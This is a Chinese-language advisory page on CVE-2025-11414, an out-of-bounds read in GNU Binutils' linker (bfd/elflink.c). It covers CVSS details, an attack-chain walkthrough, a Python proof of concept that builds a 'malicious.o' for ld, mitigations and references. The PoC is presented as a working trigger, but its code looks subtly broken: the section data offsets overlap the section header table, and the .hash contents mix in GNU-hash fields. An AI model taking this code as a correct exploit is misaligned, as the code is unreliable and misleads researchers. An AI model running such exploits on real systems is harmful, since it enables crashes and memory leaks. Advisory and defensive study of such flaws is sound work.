CVE-2025-11414：GNU Binutils链接器elflink.c越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-11414

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GNU Binutils

漏洞概述

CVE-2025-11414是GNU Binutils 2.45版本中存在的一个安全漏洞，CVSS评分为3.3，属于低危级别。该漏洞位于Binutils链接器组件的bfd/elflink.c文件中的get_link_hash_entry函数内。由于该函数在处理链接哈希表条目时缺乏对边界条件的充分检查，导致存在越界读取（Out-of-Bounds Read）缺陷。攻击者可以通过构造恶意的ELF目标文件或链接脚本，触发该漏洞进行本地攻击。

根据CVSS 3.1向量分析，该漏洞的攻击向量为本地（AV:L），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N）。在影响方面，该漏洞对机密性影响为低（C:L），对完整性无影响（I:N），对可用性影响为低（A:L）。虽然该漏洞本身严重程度不高，但由于Binutils是广泛使用的二进制工具集，被众多编译工具链和开发环境所依赖，因此其潜在影响范围不容忽视。

该漏洞已被公开披露，可能已被攻击者利用。GNU Binutils官方已发布修复补丁（commit aeaaa9af6359c8e394ce9cf24911fec4f4d23703），并在新版本2.46中修复了此问题。建议所有使用受影响版本的用户尽快升级到修复版本。

技术细节

该漏洞的核心问题位于GNU Binutils链接器组件的bfd/elflink.c文件中的get_link_hash_entry函数。当链接器处理ELF格式的目标文件时，需要通过哈希表来查找和管理符号链接条目。get_link_hash_entry函数负责从哈希表中获取对应的链接哈希条目。

漏洞的根本原因是该函数在访问哈希表条目时，未对输入的索引或哈希值进行充分的边界验证。具体而言，当处理特制的ELF文件时，恶意构造的哈希表索引或符号引用可能导致函数访问超出预分配缓冲区范围的数据，从而触发越界读取操作。

从利用方式来看，攻击者需要具备本地系统的低权限访问能力，并能够向链接器（ld）提交特制的ELF目标文件或利用受感染的项目进行链接操作。攻击过程如下：

1. 攻击者构造一个包含恶意哈希表索引或符号引用的ELF目标文件；
2. 攻击者在本地系统上使用Binutils的链接器（ld）对该文件进行链接操作；
3. 链接过程中，get_link_hash_entry函数被调用，尝试访问超出缓冲区边界的内存区域；
4. 越界读取可能导致程序崩溃（拒绝服务），或在特定条件下泄露相邻内存中的敏感信息。

虽然该漏洞的CVSS评分较低（3.3），但越界读取漏洞在特定环境下仍可能造成信息泄露或与其他漏洞结合形成更严重的攻击链。

攻击链分析

STEP 1

步骤1：环境准备

攻击者在本地系统中获取低权限访问权限，并确认目标系统使用受影响版本的GNU Binutils（2.45及以下版本）。

STEP 2

步骤2：构造恶意ELF文件

攻击者精心构造一个包含畸形哈希表条目的ELF目标文件，文件中包含超出正常范围的哈希桶索引或符号索引值，用于触发get_link_hash_entry函数中的越界读取。

STEP 3

步骤3：触发链接操作

攻击者通过命令行或自动化脚本，使用Binutils链接器（ld）对恶意ELF文件执行链接操作，或者将恶意文件植入到编译构建流程中。

STEP 4

步骤4：触发漏洞

链接器在处理恶意ELF文件时，调用get_link_hash_entry函数访问哈希表。由于哈希表索引未经充分验证，函数尝试读取超出预分配缓冲区边界的内存数据。

STEP 5

步骤5：造成影响

越界读取操作可能导致链接器进程崩溃（拒绝服务），或在特定条件下泄露相邻内存中的敏感信息（如密钥、密码或其他机密数据）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11414 PoC - GNU Binutils elflink.c Out-of-Bounds Read
# This PoC demonstrates triggering the vulnerability in get_link_hash_entry()
# by crafting a malicious ELF object file with corrupted hash table entries.

import struct
import os

def create_malicious_elf():
    """
    Create a minimal ELF object file with corrupted .hash section
    to trigger out-of-bounds read in get_link_hash_entry().
    """
    # ELF header (64-bit, little-endian)
    elf_header = bytearray()
    elf_header += b'\x7fELF'           # e_ident[EI_MAG]
    elf_header += b'\x02'               # e_ident[EI_CLASS] = ELFCLASS64
    elf_header += b'\x01'               # e_ident[EI_DATA] = ELFDATA2LSB
    elf_header += b'\x01'               # e_ident[EI_VERSION] = EV_CURRENT
    elf_header += b'\x00'               # e_ident[EI_OSABI]
    elf_header += b'\x00' * 8           # e_ident padding
    elf_header += struct.pack('<H', 1)  # e_type = ET_REL (relocatable)
    elf_header += struct.pack('<H', 62) # e_machine = EM_X86_64
    elf_header += struct.pack('<I', 1)  # e_version = EV_CURRENT
    elf_header += struct.pack('<Q', 0)  # e_entry
    elf_header += struct.pack('<Q', 0)  # e_phoff
    elf_header += struct.pack('<Q', 64) # e_shoff (section header offset)
    elf_header += struct.pack('<I', 0)  # e_flags
    elf_header += struct.pack('<H', 64) # e_ehsize
    elf_header += struct.pack('<H', 0)  # e_phentsize
    elf_header += struct.pack('<H', 0)  # e_phnum
    elf_header += struct.pack('<H', 64) # e_shentsize
    elf_header += struct.pack('<H', 4)  # e_shnum (null + .hash + .symtab + .strtab)
    elf_header += struct.pack('<H', 3)  # e_shstrndx

    # Section headers
    # SHT_NULL
    sh_null = struct.pack('<I', 0) * 16

    # .hash section header
    sh_hash = struct.pack('<I', 5)        # sh_name (offset in string table)
    sh_hash += struct.pack('<I', 5)       # sh_type = SHT_HASH
    sh_hash += struct.pack('<Q', 0)       # sh_flags
    sh_hash += struct.pack('<Q', 0)       # sh_addr
    sh_hash += struct.pack('<Q', 128)     # sh_offset (after section headers)
    sh_hash += struct.pack('<Q', 32)      # sh_size (small buffer)
    sh_hash += struct.pack('<I', 0)       # sh_link
    sh_hash += struct.pack('<I', 0)       # sh_info
    sh_hash += struct.pack('<Q', 8)       # sh_addralign
    sh_hash += struct.pack('<Q', 0)       # sh_entsize

    # .symtab section header
    sh_symtab = struct.pack('<I', 11)     # sh_name
    sh_symtab += struct.pack('<I', 2)     # sh_type = SHT_SYMTAB
    sh_symtab += struct.pack('<Q', 0)     # sh_flags
    sh_symtab += struct.pack('<Q', 0)     # sh_addr
    sh_symtab += struct.pack('<Q', 160)   # sh_offset
    sh_symtab += struct.pack('<Q', 48)    # sh_size
    sh_symtab += struct.pack('<I', 3)     # sh_link (to .strtab)
    sh_symtab += struct.pack('<I', 1)     # sh_info
    sh_symtab += struct.pack('<Q', 8)     # sh_addralign
    sh_symtab += struct.pack('<Q', 24)    # sh_entsize

    # .strtab section header
    sh_strtab = struct.pack('<I', 19)     # sh_name
    sh_strtab += struct.pack('<I', 3)     # sh_type = SHT_STRTAB
    sh_strtab += struct.pack('<Q', 0)     # sh_flags
    sh_strtab += struct.pack('<Q', 0)     # sh_addr
    sh_strtab += struct.pack('<Q', 208)   # sh_offset
    sh_strtab += struct.pack('<Q', 32)    # sh_size
    sh_strtab += struct.pack('<I', 0)     # sh_link
    sh_strtab += struct.pack('<I', 0)     # sh_info
    sh_strtab += struct.pack('<Q', 1)     # sh_addralign
    sh_strtab += struct.pack('<Q', 0)     # sh_entsize

    # .hash data - crafted to trigger OOB read
    hash_data = struct.pack('<I', 2)      # nbucket
    hash_data += struct.pack('<I', 0xFFFFFFFF)  # symndx (corrupted - causes OOB)
    hash_data += struct.pack('<I', 2)      # maskwords
    hash_data += struct.pack('<I', 0)      # shift2
    hash_data += struct.pack('<Q', 0xFFFFFFFFFFFFFFFF)  # bucket[0] (corrupted)
    hash_data += struct.pack('<Q', 0xFFFFFFFFFFFFFFFF)  # bucket[1] (corrupted)
    hash_data += struct.pack('<Q', 0xDEADBEEF)  # chain[0] (corrupted)
    hash_data += struct.pack('<Q', 0xCAFEBABE)  # chain[1] (corrupted)

    # .symtab data
    symtab_data = struct.pack('<I', 0)    # st_name
    symtab_data += b'\x00' * 4            # st_info + st_other
    symtab_data += struct.pack('<H', 0)   # st_shndx
    symtab_data += struct.pack('<Q', 0)   # st_value
    symtab_data += struct.pack('<Q', 0)   # st_size
    symtab_data = symtab_data.ljust(48, b'\x00')

    # .strtab data
    strtab_data = b'\x00.hash\x00.symtab\x00.strtab\x00'
    strtab_data = strtab_data.ljust(32, b'\x00')

    # Assemble the ELF file
    elf = elf_header + sh_null + sh_hash + sh_symtab + sh_strtab
    elf += hash_data + symtab_data + strtab_data

    return bytes(elf)

def main():
    elf_data = create_malicious_elf()
    output_file = 'malicious.o'

    with open(output_file, 'wb') as f:
        f.write(elf_data)

    print(f"[*] Malicious ELF object file created: {output_file}")
    print(f"[*] File size: {len(elf_data)} bytes")
    print(f"[*] To trigger the vulnerability, run:")
    print(f"    ld {output_file}")
    print(f"[*] Or with a linker script:")
    print(f"    ld -T script.ld {output_file}")
    print()
    print("[!] WARNING: This will trigger an out-of-bounds read in")
    print("[!] get_link_hash_entry() in bfd/elflink.c")

if __name__ == '__main__':
    main()

影响范围

GNU Binutils < 2.46

GNU Binutils 2.45

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制本地用户对Binutils链接器（ld）的访问权限；2）在沙箱或受限环境中处理不受信任的ELF目标文件；3）对输入的ELF文件进行完整性校验；4）监控链接器进程的异常行为，及时发现潜在的攻击活动；5）关注官方补丁发布并尽快完成升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11414
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11414
3 Details https://www.cvedetails.com/cve/CVE-2025-11414/
4 VulDB https://vuldb.com/cve/CVE-2025-11414
5 Link https://sourceware.org/bugzilla/attachment.cgi?id=16361
6 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33450
7 Link https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aeaaa9af6359c8e394ce9cf24911fec4f4d23703
8 Link https://vuldb.com/?ctiid.327350
9 Link https://vuldb.com/?id.327350
10 Link https://vuldb.com/?submit.665591
11 Link https://www.gnu.org/
12 Link https://cert-portal.siemens.com/productcert/html/ssa-082556.html
13 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33450